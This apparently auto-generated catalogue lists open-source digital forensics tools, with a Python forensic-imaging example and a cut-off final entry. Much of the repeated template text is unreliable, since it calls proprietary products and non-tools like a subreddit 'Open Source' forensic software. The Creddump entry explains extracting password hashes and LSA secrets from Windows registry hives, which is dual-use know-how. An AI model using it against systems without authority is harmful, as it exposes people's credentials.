Open-Source Cybersecurity Tools: Digital Forensics & DFIR

This category contains 145 documented tools. It focuses on capabilities used for timeline creation, disk and memory evidence analysis, and legal-quality reporting. Use this section when building shortlists, comparing operational tradeoffs, and mapping controls to detection/response ownership.

Category Evaluation Checklist

  • Coverage depth against your highest-priority threats and compliance obligations.
  • Operational overhead for deployment, tuning, and long-term maintenance.
  • Signal quality versus analyst workload and false-positive pressure.
  • Integration fit with SIEM, ticketing, identity, cloud, and engineering workflows.
  • Governance readiness including auditability, ownership clarity, and change control.

Letter

This letter section contains 6 tools.

Autopsy

  • Website: https://www.sleuthkit.org/autopsy
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Cyber Security Tools

What it does: Autopsy is used in digital forensics & DFIR programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Digital forensics platform and graphical interface.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Digital Forensics.

Caine

  • Website: https://www.caine-live.net
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Cyber Security Tools, Awesome Hacking

What it does: Caine is used in digital forensics & DFIR programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: CAINE is an Ubuntu-based app that offers a complete forensic environment that provides a graphical interface. This tool can be integrated into existing software tools as a module. It automatically extracts a timeline from RAM.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Linux Distributions.

FTK Imager

  • Website: https://accessdata.com/product-download/ftk-imager-version-4.2
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Cyber Security Tools

What it does: FTK Imager is used in digital forensics & DFIR programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Forensic imaging tool.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Digital Forensics.

The Sleuth Kit (TSK)

  • Website: https://www.sleuthkit.org
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Cyber Security Tools

What it does: The Sleuth Kit (TSK) is used in digital forensics & DFIR programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: A library and collection of command-line tools for digital forensics.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Digital Forensics.

X1 Search

  • Website: https://www.x1.com/products/x1-search
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Cyber Security Tools

What it does: X1 Search is used in digital forensics & DFIR programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Forensic search and data extraction tool.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Digital Forensics.

/r/computerforensics/

  • Website: https://www.reddit.com/r/computerforensics/
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Forensics

What it does: /r/computerforensics/ is used in digital forensics & DFIR programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Subreddit for computer forensics.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Resources > Other.

Letter A

This letter section contains 11 tools.

A1 Website Download

  • Website: http://www.microsystools.com/products/website-download
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome OSINT

What it does: A1 Website Download is used in digital forensics & DFIR programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Download entire websites to disk.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome OSINT > Offline Browsing.

acquirepi

  • Website: https://github.com/plonxyz/acquirepi
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Forensics

What it does: acquirepi is used in digital forensics & DFIR programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Successor to 4n6pi, a scalable forensic disk imager designed to run on a Raspberry Pi, powered by libewf.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Imaging.

ALEAPP

  • Website: https://github.com/abrignoni/ALEAPP
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Forensics

What it does: ALEAPP is used in digital forensics & DFIR programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: An Android Logs, Events and Protobuf Parser.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Mobile Forensics.

ALEX

  • Website: https://github.com/prosch88/ALEX
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Forensics

What it does: ALEX is used in digital forensics & DFIR programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Extract files from ADB devices on Windows, Linux and macOS. Mostly a wrapper for adbutils.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Acquisition.

Andriller

  • Website: https://github.com/den4uk/andriller
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Forensics

What it does: Andriller is used in digital forensics & DFIR programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: A software utility with a collection of forensic tools for smartphones.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Mobile Forensics.

APFS Fuse

  • Website: https://github.com/sgan81/apfs-fuse
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Forensics

What it does: APFS Fuse is used in digital forensics & DFIR programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: A read-only FUSE driver for the new Apple File System.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > OS X Forensics.

ArtEx

  • Website: https://www.doubleblak.com/index.php
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Forensics

What it does: ArtEx is used in digital forensics & DFIR programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Artifact Examiner for iOS Full File System extractions.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Mobile Forensics.

ArtifactExtractor

  • Website: https://github.com/Silv3rHorn/ArtifactExtractor
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Forensics

What it does: ArtifactExtractor is used in digital forensics & DFIR programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Extract common Windows artifacts from source images and VSCs (Volume Shadow Copies).

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Acquisition.

Audacity

  • Website: http://sourceforge.net/projects/audacity/
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome CTF

What it does: Audacity is used in digital forensics & DFIR programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Analyze sound files (mp3, m4a, whatever).

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Solve > Forensics.

Autopsy

  • Website: http://www.sleuthkit.org/autopsy/
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Hacking, Awesome Forensics

What it does: Autopsy is used in digital forensics & DFIR programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: A digital forensics platform and graphical interface to The Sleuth Kit and other digital forensics tools.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Frameworks.

Awesome Anti Forensics

  • Website: https://github.com/remiflavien1/awesome-anti-forensic
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Security

What it does: Awesome Anti Forensics is used in digital forensics & DFIR programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: A collection of awesome tools used to counter forensics activities.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Security > Other Awesome Lists > Other Security Awesome Lists.

Letter B

This letter section contains 6 tools.

Beagle

  • Website: https://github.com/yampelo/beagle
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Forensics

What it does: Beagle is used in digital forensics & DFIR programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Transform data sources and logs into graphs.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Windows Artifacts.

BelkaCTF

  • Website: https://belkasoft.com/ctf
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Forensics

What it does: BelkaCTF is used in digital forensics & DFIR programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: CTFs by Belkasoft.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Learn Forensics > CTFs and Challenges.

Belkasoft RAM Capturer

  • Website: https://belkasoft.com/ram-capturer
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Forensics

What it does: Belkasoft RAM Capturer is used in digital forensics & DFIR programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Volatile memory acquisition tool.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Acquisition.

Bkhive and Samdump2

  • Website: http://sourceforge.net/projects/ophcrack/files/samdump2/
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome CTF

What it does: Bkhive and Samdump2 are used in digital forensics & DFIR programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe them as: Dump SYSTEM and SAM files.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Solve > Forensics.

Blauhaunt

  • Website: https://github.com/cgosec/Blauhaunt
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Forensics

What it does: Blauhaunt is used in digital forensics & DFIR programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: A tool collection for filtering and visualizing logon events.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Windows Artifacts.

bstrings

  • Website: https://github.com/EricZimmerman/bstrings
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Forensics

What it does: bstrings is used in digital forensics & DFIR programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Improved strings utility.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Carving.

Letter C

This letter section contains 8 tools.

CFF Explorer

  • Website: http://www.ntcore.com/exsuite.php
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome CTF

What it does: CFF Explorer is used in digital forensics & DFIR programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: PE editor.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Solve > Forensics.

chrome-url-dumper

  • Website: https://github.com/eLoopWoo/chrome-url-dumper
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Forensics

What it does: chrome-url-dumper is used in digital forensics & DFIR programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Dump all locally stored information collected by Chrome.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Internet Artifacts.

ChromeCacheView

  • Website: https://www.nirsoft.net/utils/chrome_cache_view.html
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Forensics

What it does: ChromeCacheView is used in digital forensics & DFIR programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: A small utility that reads the cache folder of the Google Chrome web browser and displays the list of all files currently stored in the cache.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Internet Artifacts.

CobaltStrikeScan

  • Website: https://github.com/Apr4h/CobaltStrikeScan
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Cybersecurity Blue Team

What it does: CobaltStrikeScan is used in digital forensics & DFIR programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Scan files or process memory for Cobalt Strike beacons and parse their configuration.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Cybersecurity Blue Team > Windows-based defenses.

Computer Aided Investigative Environment (CAINE)

  • Website: https://caine-live.net/
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Cybersecurity Blue Team

What it does: Computer Aided Investigative Environment (CAINE) is used in digital forensics & DFIR programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Italian GNU/Linux live distribution that pre-packages numerous digital forensics and evidence collection tools.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Cybersecurity Blue Team > Operating System distributions.

Back to Name Jump

Creddump

  • Website: https://github.com/moyix/creddump
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome CTF

What it does: Creddump reads Windows registry hives offline and extracts credential material from them. Source summaries describe it as: Dump windows credentials. Its three scripts recover LM/NT password hashes from the SAM hive (pwdump), cached domain logon hashes from the SECURITY hive (cachedump) and LSA secrets such as service account passwords (lsadump); all three also need the SYSTEM hive, because the boot key that protects the other hives is derived from it.

Operational value: In an investigation it shows what an attacker holding a copy of the hives (from a disk image, a volume shadow copy or a "reg save") could have recovered, and the hashes it produces can be compared with those found in attacker tooling or cracking output. It is listed from a CTF source and is equally a post-exploitation technique, so its use must be covered by the engagement or investigation authority.

Typical deployment pattern: Export SAM, SECURITY and SYSTEM from the forensic image (they live under Windows\System32\config) and run the scripts on the examination workstation; nothing needs to run on the suspect host.

Selection considerations: The original repository targets Python 2 and has been quiet for years; look for a maintained Python 3 fork and validate its output against a hive set whose contents you already know. As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Solve > Forensics.

Back to Name Jump

CyberDefenders

  • Website: https://cyberdefenders.org/blueteam-ctf-challenges/?type=ctf
  • Model: Online service
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Forensics

What it does: CyberDefenders is an online blue-team training platform offering DFIR challenges built around prepared evidence (disk images, memory dumps, packet captures and log sets). The source list gives no description. It is a training resource, not software you install.

Operational value: Lets analysts practise triage, timeline building and memory analysis on realistic evidence, which is a cheap way to rehearse the workflows the tools in this catalogue support before an incident forces the issue.

Typical deployment pattern: Nothing to deploy; use it for onboarding, team exercises and skill validation.

Selection considerations: It is a hosted service rather than open-source software, so its terms of use govern how challenge material may be shared internally. Related source context: Awesome Forensics > Learn Forensics > CTFs and Challenges.

Back to Name Jump

CybersecurityGuide – Digital Forensics Careers

  • Website: https://cybersecurityguide.org/careers/digital-forensics/
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Forensics

What it does: A career guide, not a tool: it covers the skills, certifications and job paths in digital forensics. Source summaries describe it as: Guide on skills, certs, and career paths in cyber forensics.

Operational value: Useful when writing job descriptions, planning analyst development or explaining the discipline to people outside the team; it has no role in an investigation.

Typical deployment pattern: Nothing to deploy.

Selection considerations: Treat it as one publisher's view of the field and cross-check its certification recommendations against what current employers and regulators actually ask for. Related source context: Awesome Forensics > Resources > Other.

Back to Name Jump

Letter D

This letter section contains 12 tools.

dc3dd

  • Website: https://sourceforge.net/projects/dc3dd/
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Forensics

What it does: dc3dd is a patched version of GNU dd, developed at the US Department of Defense Cyber Crime Center (DC3) for evidence acquisition. Source summaries describe it as: Improved version of dd. Over plain dd it adds hashing of the data as it is copied (MD5, SHA-1, SHA-256, SHA-512), a log of the run, handling of unreadable sectors by zero-filling them and recording their positions, splitting of the output into fixed-size pieces, and hashing of the written image so it can be verified against the source.

Operational value: A raw image with a contemporaneous hash and error log is the foundation of a defensible chain of custody; dc3dd produces all three in one pass instead of requiring a separate hash run over the source device.

Typical deployment pattern: Run from a forensic boot environment or through a write blocker, write the image and log to a separate destination device, then verify the image hash before the image is used for analysis. Because a zero-filled sector changes the stream, the hash must always be read together with the bad-sector list in the log.

Selection considerations: Compare its error handling, log format and hash options with dcfldd and with the imagers built into the platforms you already use, and confirm it is packaged for your acquisition environment. As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Imaging.

Back to Name Jump

dcfldd

  • Website: https://sourceforge.net/projects/dcfldd/
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Forensics

What it does: dcfldd is an enhanced dd developed at the US DoD Computer Forensics Laboratory, independent of dc3dd. Source summaries describe it as: Different improved version of dd (this version has some bugs; another version is on GitHub). It adds on-the-fly hashing of the input and of output chunks, a hash log, progress output, splitting of the image into several files and writing to more than one output at once.

Operational value: The same as dc3dd: one pass yields the image, its hash and a log. It is packaged in most Linux distributions, which makes it a convenient fallback when dc3dd is not installed.

Typical deployment pattern: As for dc3dd, image through a write blocker to a separate destination and verify the hash before analysis.

Selection considerations: The SourceForge release the source list links to is old and has known bugs; the list notes that a separately maintained version exists on GitHub. Whichever you use, confirm its hashes against an independent tool on a test image before trusting it on evidence. As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Imaging.
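The acquisition behaviour described for dc3dd and dcfldd above (hash while copying, zero-fill and log unreadable blocks, re-hash the finished image to verify), as an added example written for this page rather than code from either project. The "device" is a constructed in-memory sample with one unreadable block, so the block runs offline; the function and file names are the example's own.

```python
"""Streaming forensic imaging with hash-on-copy, bad-block handling and a log.

Added example, not dc3dd or dcfldd code. It reproduces what those tools add
to plain dd: hash the data while it is copied, zero-fill blocks that cannot
be read and record their offsets, then hash the written image and compare.
The device here is a constructed in-memory sample with one bad block.
"""
import hashlib
import os
import tempfile

BLOCK = 512  # bytes per block; real devices report their own sector size


def make_flaky_reader(data, bad_blocks):
    """Constructed stand-in for a device: read_block(i) returns block i of
    data, or raises OSError for indices in bad_blocks (a simulated I/O error)."""
    def read_block(i):
        if i in bad_blocks:
            raise OSError(f"Input/output error at block {i}")  # simulated fault
        return data[i * BLOCK:(i + 1) * BLOCK]
    return read_block


def image_device(read_block, nblocks, image_path, log_path, algo="sha256"):
    """Copy nblocks blocks to image_path, hashing the stream as it is read.

    Unreadable blocks are replaced by zeros and logged with their offsets,
    the equivalent of dd's conv=noerror,sync. Returns (hex digest of the
    imaged stream, list of bad block indices). The digest covers the
    zero-filled blocks, so it is only meaningful next to the bad-block list.
    """
    h = hashlib.new(algo)
    bad = []
    with open(image_path, "wb") as out:
        for i in range(nblocks):
            try:
                chunk = read_block(i)
            except OSError as err:
                chunk = b"\x00" * BLOCK
                bad.append((i, str(err)))
            h.update(chunk)
            out.write(chunk)
    digest = h.hexdigest()
    with open(log_path, "w") as log:
        log.write(f"blocks={nblocks} block_size={BLOCK}\n")
        log.write(f"input_{algo}={digest}\n")
        log.write(f"bad_blocks={len(bad)}\n")
        for i, err in bad:
            log.write(f"  block {i} offset {i * BLOCK}: {err}\n")
    return digest, [i for i, _ in bad]


def hash_file(path, algo="sha256"):
    """Hash a finished image in 64 KiB chunks rather than reading it whole."""
    h = hashlib.new(algo)
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def verify_image(image_path, expected_digest, algo="sha256"):
    """The check dc3dd's output-hash option performs: re-hash the written
    image and compare it with the hash taken while copying."""
    return hash_file(image_path, algo) == expected_digest


def sample_run():
    """Image a constructed 8-block device whose block 3 is unreadable."""
    data = bytes(range(256)) * (8 * BLOCK // 256)  # 4096 bytes, constructed
    reader = make_flaky_reader(data, {3})
    # What the image must contain: the source with block 3 zero-filled.
    expected_stream = data[:3 * BLOCK] + b"\x00" * BLOCK + data[4 * BLOCK:]
    expected = hashlib.sha256(expected_stream).hexdigest()
    with tempfile.TemporaryDirectory() as workdir:
        image = os.path.join(workdir, "evidence.dd")
        log = os.path.join(workdir, "evidence.log")
        digest, bad = image_device(reader, 8, image, log)
        verified = verify_image(image, digest)
        with open(log) as f:
            log_text = f.read()
    return {"digest": digest, "expected": expected, "verified": verified,
            "bad_blocks": bad, "log": log_text}


if __name__ == "__main__":
    result = sample_run()
    print(result["log"])
    print("image verified:", result["verified"])
```

The point to take from it is the last paragraph of the log: a verified image hash says the copy matches what was read, not that everything was readable, so the bad-block list travels with the hash in the acquisition notes.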

Back to Name Jump

DefCon CTFs

  • Website: https://archive.ooo
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Forensics

What it does: An archive of DEF CON CTF challenges, not a tool. Source summaries describe it as: archive of DEF CON CTF challenges. archive.ooo is run by Order of the Overflow (OOO), the team that organised DEF CON CTF from 2018 to 2021, and holds the challenge material from those years.

Operational value: Practice material. Most of it is binary exploitation and reverse engineering rather than forensics, so it serves the analysis skills behind DFIR more than evidence-handling procedure.

Typical deployment pattern: Nothing to deploy; challenges are downloaded and worked locally.

Selection considerations: The usual maintainer and release criteria do not apply; check that a challenge's files are complete before building training around it. Related source context: Awesome Forensics > Learn Forensics > CTFs and Challenges.

Back to Name Jump

dexter

  • Website: https://github.com/coinbase/dexter
  • Model: Open Source
  • Category: Digital Forensics & DFIR
  • Source Lists: Awesome Forensics

